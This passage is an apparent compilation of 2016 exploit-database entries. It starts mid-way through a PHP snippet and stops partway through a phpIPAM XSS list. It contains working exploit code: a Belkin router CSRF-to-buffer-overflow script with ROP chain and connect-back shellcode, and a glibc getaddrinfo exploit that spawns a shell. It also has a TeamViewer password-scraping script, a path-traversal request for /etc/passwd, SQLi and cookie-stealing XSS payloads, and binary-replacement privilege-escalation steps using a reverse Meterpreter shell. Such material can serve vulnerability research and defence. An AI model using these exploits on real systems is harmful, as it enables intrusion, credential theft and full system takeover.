}catch(Exception $e){
}
return $row;
}
if($_GET["id"]){
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly
# Exploit Title: Battle.Net 1.5.0.7963 Local Privilege Escalation
# Date: 11/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: www.battle.net
# Software Link: https://eu.battle.net/account/download/
# Version: Version 1.5.0.7963
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
Battle.Net installs by default to "C:\Program Files (x86)\Battle.Net" with weak folder permissions granting any built-in user account with full permission to the contents of
the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the application. This is not limited to just
the Battle.Net directory, but also to any of Blizzards game installation folders as installed by Battle.Net.
2. Proof
C:\Program Files>cacls Battle.net
C:\Program Files\Battle.net BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Diablo III"
C:\Program Files\Diablo III BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "StarCraft II"
C:\Program Files\StarCraft II BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls Hearthstone
C:\Program Files\Hearthstone BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Heroes of the Storm"
C:\Program Files\Heroes of the Storm BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files (x86)>cacls "World of Warcraft"
C:\Program Files (x86)\World of Warcraft BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
3. Exploit:
Simply replace any of the game exe's or any of the dll's with your preferred payload and wait for execution.
# Exploit Title: Zapya Desktop Version ('ZapyaService.exe') Privilege Escalation
# Date: 2016/9/12
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://www.izapya.com/
# Software Link: http://binaries.izapya.com/Izapya/Windows_PC/ZapyaSetup_1803_en.exe
# Version: 1.803 (Latest)
# Tested on: Windows 7 Professional X86 - Windows 10 Pro X64
# CVE : N/A
======================
# Description :
# Zapya is a 100% free tool for sharing files across devices like Android, iPhone, iPad, Window’s Phone, PC, and Mac computers in an instant.
# It’s Easy to use and supports multiple languages. We are already a community of 300 million strong users and growing rapidly.
# When You Install Zapya Desktop , Zapya Will Install A Service Named ZapyaService.exe And It's Placed In Zapya Installation Directory .
# If We Replace The ZapyaService.exe File With A Malicious Executable File It Will Execute As NT/SYSTEM User Privilege.
======================
# Proof Of Concept :
# 1- Install Zapya Desktop .
# 2- Generate A Meterpreter Executable Payload .
# 3- Stop Service And Replace It With ZapyaService.exe With Exact Name.
# 4- Listen Handler For Connection And Start Service Again or Open Zapya Desktop , Application Will Attempt To Start Service
# 5- After Starting Service We Have Reverse Meterpreter Shell With NT/SYSTEM Privilege.
==================
# Discovered By Arash Khazaei
==================
import socket, sys , base64, struct, string, urllib
from getopt import getopt as GetOpt, GetoptError
from uuid import getnode as get_mac
import SimpleHTTPServer, SocketServer
# TIMELINE #
'''
3/16/2016 - First Submission to Belkin [no response]
5/3/2016 - Second Submission to Belkin [no response]
6/4/2016 - Notification of 0day [vendor responded]
Vendor Response: Our email system was broken but we want another 90 days.
9/3/2016 - Notification of 0day sent to Belkin. [no response]
9/4/2016 - The second 90 day extension is over.
'''
# Root cause analysis and all of that fun stuff
'''
This is the CSRF PoC. You will need to embed your JS soruce somewhere. '<script src=//ip.addr/a.js>'
The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible.
XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs.
There is no protection against CSRFs so I made this CSRF PoC.
The BoF Vulnerability:
File Name: fmmgmt.c
-------------------------------------------------------------
void formSetLanguage(webs_t wp, char_t *path, char_t *query)
{
[CUT]
...
if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){
strcpy(tmpbuf, T("Set WEB language error!"));
goto setErr;
}
apmib_update(CURRENT_SETTING);
setErr:
urltmp = websGetVar(wp, T("webpage"), T(""));
sprintf(tmpbuf, "/%s", urltmp);
-------------------------------------------------------------
In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!
ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable.
'''
# GREETZ
'''
@AustinHackers - I love you all <3
@Laughing_Mantis - Cause I said I would!
@MisterCh0c - Keep on h4x0ring IoT products!
@IoTVillage - You guys rock!
@HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D
@avicoder - cause you're awesome! :D
@TheZDI - If it weren't for your comment of wanting me to bypass auth then I wouldn't of found these vulns.
Everyone over at Praetorian - You guys are awesome <3.
'''
def usage():
print ""
print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
print "By: Elvis Collado [b1ack0wl]"
print ""
print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
print ""
print "\t-s Connect back IP [LHOST]"
print "\t-d Destination IP of Socket Listener [RHOST]"
print "\t-h Print this Help Menu"
print ""
sys.exit(1)
# Hacky but whatever it gets the point across.
if len(sys.argv) < 3:
usage()
try:
(opts, args) = GetOpt(sys.argv[1:], 's:d:h')
except GetoptError, e:
usage()
for opt, arg in opts:
if opt == "-s":
connectback_ip = arg.split(".")
for a in connectback_ip:
if int(a) == 0:
print "IP cannot have NULL Bytes :("
sys.exit(1)
IP_1= struct.pack("<B",int(connectback_ip[0]))
IP_2= struct.pack("<B",int(connectback_ip[1]))
IP_3= struct.pack("<B",int(connectback_ip[2]))
IP_4= struct.pack("<B",int(connectback_ip[3]))
elif opt == "-d":
host = arg
elif opt == "-h":
usage()
# Shellcode from bowcaster.
shellcode = string.join([
"\x24\x0f\xff\xfa", # li t7,-6
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x21\xe4\xff\xfd", # addi a0,t7,-3
"\x21\xe5\xff\xfd", # addi a1,t7,-3
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x24\x02\x10\x57", # li v0,4183
"\x01\x01\x01\x0c", # syscall 0x40404
"\xaf\xa2\xff\xff", # sw v0,-1(sp)
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x34\x0f\xff\xfd", # li t7,0xfffd
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\xaf\xaf\xff\xe0", # sw t7,-32(sp)
# Port 8080
"\x3c\x0e\x1f\x90", # lui t6,0x1f90
"\x35\xce\x1f\x90", # ori t6,t6,0x1f90
# Store Port
"\xaf\xae\xff\xe4", # sw t6,-28(sp)
# Big endian IP address 192.168.206.2
"\x3c\x0e"+IP_1+IP_2, # lui t6,0x7f01
"\x35\xce"+IP_3+IP_4, # ori t6,t6,0x101
"\xaf\xae\xff\xe6", # sw t6,-26(sp)
"\x27\xa5\xff\xe2", # addiu a1,sp,-30
"\x24\x0c\xff\xef", # li t4,-17
"\x01\x80\x30\x27", # nor a2,t4,zero
"\x24\x02\x10\x4a", # li v0,4170
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x0f\xff\xfd", # li t7,-3
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x01\xe0\x28\x21", # move a1,t7
"\x24\x02\x0f\xdf", # li v0,4063
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x10\xff\xff", # li s0,-1
"\x21\xef\xff\xff", # addi t7,t7,-1
"\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop>
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x3c\x0f\x2f\x2f", # lui t7,0x2f2f
"\x35\xef\x62\x69", # ori t7,t7,0x6269
"\xaf\xaf\xff\xec", # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f", # lui t6,0x6e2f
"\x35\xce\x73\x68", # ori t6,t6,0x7368
"\xaf\xae\xff\xf0", # sw t6,-16(sp)
"\xaf\xa0\xff\xf4", # sw zero,-12(sp)
"\x27\xa4\xff\xec", # addiu a0,sp,-20
"\xaf\xa4\xff\xf8", # sw a0,-8(sp)
"\xaf\xa0\xff\xfc", # sw zero,-4(sp)
"\x27\xa5\xff\xf8", # addiu a1,sp,-8
"\x24\x02\x0f\xab", # li v0,4011
"\x01\x01\x01\x0c" # syscall 0x40404
], '')
# getRect() son
huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D
huge_string += "!" # Filler
huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep
huge_string += "\x43\x43\x43\x43" # s1 but after sleep it's just padding
huge_string += struct.pack(">L",0x2aafc840) # RA OverWrite # move t9,s0 jalr t9
huge_string += "\x44\x44\x44\x44" * 6 # padding
huge_string += struct.pack(">L",0x31313131) # s0 - Sleep
huge_string += struct.pack(">L",0x2aafc840) # s1
huge_string += struct.pack(">L",0x34343434) # s2
huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA
huge_string += "\x45\x45\x45\x45" * 9 # Padding
huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA
huge_string += "\x46\x46\x46\x46" * 10
huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled.
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += struct.pack(">L",0x2739e8b8)
huge_string += "\x47\x47\x47\x47" # Padding becomes NULL
huge_string += shellcode # shellcode start
'''
NOTES
libc = 0x2aad0000
0x2aafc840 (Sleep)
Gadget 1
0x2aafc840: move t9,s0 # Sleep
0x2aafc844: jalr t9 # call sleep. The rest of the instructions will not block out payload and are not included.
Gadget 2
0x2aaf9f38: move t9,s1 # Addr to Gadget 3
0x2aaf9f3c: lw ra,52(sp)
0x2aaf9f40: lw s3,48(sp)
0x2aaf9f44: lw s2,44(sp)
0x2aaf9f48: lw s1,40(sp)
0x2aaf9f4c: lw s0,36(sp)
0x2aaf9f50: jr t9 # Call Gadget 3
Gadget 3
0x2aaf9808: addiu a0,sp,24 # Add offet +24 to SP and store it in A0
0x2aaf980c: lw ra,52(sp) # load Ret addr
0x2aaf9810: jr ra # ret
Gadget 4 (Stack Exec)
0x2aaf97fc: move t9,a0 # move A0 which contains the address of the stack
0x2aaf9800: sw v0,24(sp)
0x2aaf9804: jalr t9 # Jump to the stack
0x2aaf9808: addiu a0,sp,24 # Before jumping, add +24 to the stack and store it in A0
'''
csrf_file = open('a.js', 'wb')
params = urllib.urlencode({'webpage': huge_string}) # Vulnerable parameter
destination_addr = 'x.open("POST", "http://' + host + '/goform/formSetLanguage"' + ',true);\n' # Vulnerable Endpoint that does not require authentication
# Write CSRF PoC
csrf_file.write('function getrekt(){')
csrf_file.write('var x = new XMLHttpRequest();\n')
csrf_file.write(destination_addr)
csrf_file.write('x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n')
csrf_file.write('x.send("' + params + '");')
csrf_file.write('}\ngetrekt();')
# Close file since we're doing writing to it.
csrf_file.close()
# Now Host the CSRF File
mac = get_mac()
PORT = 80 # This is why superuser rights are needed
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
mac_addr = ':'.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT
print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m"
httpd.serve_forever()
######################
# Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://rbplugin.com/
# Category [ Webapps ]
# Tested on [ Win ]
# Version : 2.4.7
# Date 2016/09/03
######################
PoC
The Vulnerable page is
/ext/forcedownload.php
http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd
Youtube:https://youtu.be/5kE8Xt-My9A
######################
# Discovered by : Mojtaba MobhaM Mail:Kazemimojtaba@live.com
# B3li3v3 M3 I will n3v3r St0p
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
Title: WIN-911 - Insecure File Permissions EoP
CWE Class: CWE-276: Incorrect Default Permissions
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to escalate their privilege to system administrator
or SYSTEM on vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
PoC 1:
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to modify files within this location.
Besides executables running with administrative privileges there are also various services binaries.
These all run as SYSTEM and might be overwritten to obtain SYSTEM level access:
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Inbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Outbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\viewLinc Bridge.exe
PoC 2:
The web-server is installed as a separate component under:
"C:\Program Files\Specter Instruments\WEB-911 Services"
This directory allows EVERYONE full-control.
Once exploited, this could affect remote users connecting to the web-server.
- 3. Mitigation: -
None.
If you are brave, edit the permissions.
Not sure how this impacts the application.
- 4. Author: -
sh4d0wman
################################################################
Title: WIN-911 - Credential Disclosure
CWE Class: CWE-276: Incorrect Default Permissions | CWE-256: Plaintext Storage of a Password
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to obtain certain usernames and passwords on
vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to read and modify files within this location.
During configuration an .ini file is populated with information.
Some of this information is sensitive.
The following settings will log credentials in plain-text:
FIX Remote Alarm
ArchestrA Direct Connect
viewLinc Direct Connect
WIN911 Pager
E-mail POP and SMTP
- 3. Mitigation: -
None yet.
- 4. Author: -
sh4d0wman
#####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
from winappdbg import Debug, Process, HexDump
import sys
import re
filename = 'TeamViewer.exe'
def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.
# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]
print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')
found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'
if len(found) > 1:
s = list(set([x for x in found if found.count(x) > 1]))
for i in s:
pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
return found
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# For all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid)
finally:
debug.stop()
/*
add by SpeeDr00t@Blackfalcon (jang kyoung chip)
This is a published vulnerability by google in the past.
Please refer to the link below.
Reference:
- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
- https://github.com/fjserna/CVE-2015-7547
- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow
When Google announced about this code(vulnerability),
it was missing information on shellcode.
So, I tried to completed the shellcode.
In the future, I hope to help your study.
(gdb) r
Starting program: /home/haker/client1
Got object file from memory but can't read symbols: File truncated.
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60259
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = ��foobargooglecom
query = foobargooglecom$(�foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60260
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = ��foobargooglecom
query = foobargooglecom$�7foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
process 6415 is executing new program: /bin/dash
$ id
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
$
*/
import socket
import time
import struct
import threading
IP = '192.168.111.5' # Insert your ip for bind() here...
ANSWERS1 = 184
terminate = False
last_reply = None
reply_now = threading.Event()
def dw(x):
return struct.pack('>H', x)
def dd(x):
return struct.pack('>I', x)
def dl(x):
return struct.pack('<Q', x)
def db(x):
return chr(x)
def udp_thread():
global terminate
# Handle UDP requests
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((IP, 53))
reply_counter = 0
counter = -1
answers = []
while not terminate:
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id_udp = struct.unpack('>H', data[0:2])[0]
query_udp = data[12:]
# Send truncated flag... so it retries over TCP
data = dw(id_udp) # id
data += dw(0x8380) # flags with truncated set
data += dw(1) # questions
data += dw(0) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query_udp # question
data += '\x00' * 2500 # Need a long DNS response to force malloc
answers.append((data, addr))
if len(answers) != 2:
continue
counter += 1
if counter % 4 == 2:
answers = answers[::-1]
print 'udp send '
time.sleep(0.01)
sock_udp.sendto(*answers.pop(0))
print 'sendto 1 '
reply_now.wait()
sock_udp.sendto(*answers.pop(0))
print 'sendto 2 '
sock_udp.close()
def tcp_thread():
global terminate
counter = -1
#Open TCP socket
sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_tcp.bind((IP, 53))
sock_tcp.listen(10)
print 'a'
while not terminate:
conn, addr = sock_tcp.accept()
counter += 1
print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])
# Read entire packet
data = conn.recv(1024)
print '[TCP] Total Data len recv ' + str(len(data))
reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])
print '[TCP] Request1 len recv ' + str(reqlen1)
data1 = data[2:2+reqlen1]
print 'data1 = ' +data1
id1 = struct.unpack('>H', data1[0:2])[0]
query1 = data[12:]
print 'query = ' + query1
# Do we have an extra request?
data2 = None
if len(data) > 2+reqlen1:
reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])
print '[TCP] Request2 len recv ' + str(reqlen2)
data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]
id2 = struct.unpack('>H', data2[0:2])[0]
query2 = data2[12:]
# Reply them on different packets
data = ''
data += dw(id1) # id
data += dw(0x8180) # flags
data += dw(1) # questions
data += dw(ANSWERS1) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query1 # question
for i in range(ANSWERS1):
answer = dw(0xc00c) # name compressed
answer += dw(1) # type A
answer += dw(1) # class
answer += dd(13) # ttl
answer += dw(4) # data length
answer += 'D' * 4 # data
data += answer
data1_reply = dw(len(data)) + data
if data2:
data = ''
data += dw(id2)
data += 'A' * (6)
data += '\x08\xc5\xff\xff\xff\x7f\x00\x00'
data += '\x90' * (44)
data += '\x90' * (1955)
data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
data += '\x90' * (100)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'F' * (8)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'G' * (134)
data2_reply = dw(len(data)) + data
else:
data2_reply = None
reply_now.set()
time.sleep(0.01)
conn.sendall(data1_reply)
print 'data1_reply'
time.sleep(0.01)
if data2:
conn.sendall(data2_reply)
print 'data2_reply'
reply_now.clear()
sock_tcp.shutdown(socket.SHUT_RDWR)
sock_tcp.close()
if __name__ == "__main__":
t = threading.Thread(target=udp_thread)
t.daemon = True
t.start()
tcp_thread()
terminate = True
PHPIPAM 1.2.1 Multiple Vulnerabilities
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: 06 Sep 2016
Tested Version: phpipam-1.2.1 (Latest Version - modified on 2016-02-13)
Vendor: http://phpipam.net/
Product URL: https://sourceforge.net/projects/phpipam/
Date: 20 Mar 2016
About Product:
---------------
phpipam is an open-source web IP address management application (IPAM). Its goal is to provide light, modern and useful IP address management.
It is php-based application with MySQL database backend, using jQuery libraries, ajax and some HTML5/CSS3 features.
Vulnerability Report:
----------------------
SQL Injection Vulnerability (3 Items):
on Tools>Changelog
[sPage] Parameter is vulnerable against SQLi.
Method: GET
Payload:
http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50' [SQLi]
on http://[Site]/phpipam/app/tools/user-menu/user-edit.php
[lang] and [printLimit] Parameters are vulnerable against SQLi.
Payload:
Method : POST
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&mailNotify=No&mailChangelog=No&printLimit=30&lang=9'[SQLi]
OR
Method : POST
http://[Site]/phpipam/app/tools/user-menu/user-edit.php
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&lang=9&mailNotify=No&mailChangelog=No&printLimit=30'[SQLi]
===============================================
XSS Vulnerability (36 Items):
Method: POST
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2"><script>alert(document.cookie);</script>&action=edit
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2&action=edit"><script>alert(document.cookie);</script>
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/scan-agents/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/users/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/tags/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/instructions/preview.php
PostData:
instructions=You+can+write+instructions+under+admin+menu!"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=1&subnetId=5&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&location=IPaddresses
http://[Site]/phpipam/app/admin/devices/edit.php
PostData:
switchId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/device-types/edit.php
PostData:
tid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit&vlanNum="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id=&action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fieldName=&table=ipaddresses
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add&fieldName=&table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/filter.php
PostData:
table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/replace-fields/result.php
PostData:
field=description"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&search=a&csrf_cookie=892d2a900ec7fc1ba9486ec171a36f71&replace=a
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=1&subnetId=6&action=edit&location=IPaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=2&subnetId="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add&location=IPaddresses
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fval=a&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a&direction=hostname%7Casc"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/tools/subnet-masks/popup.php
PostData:
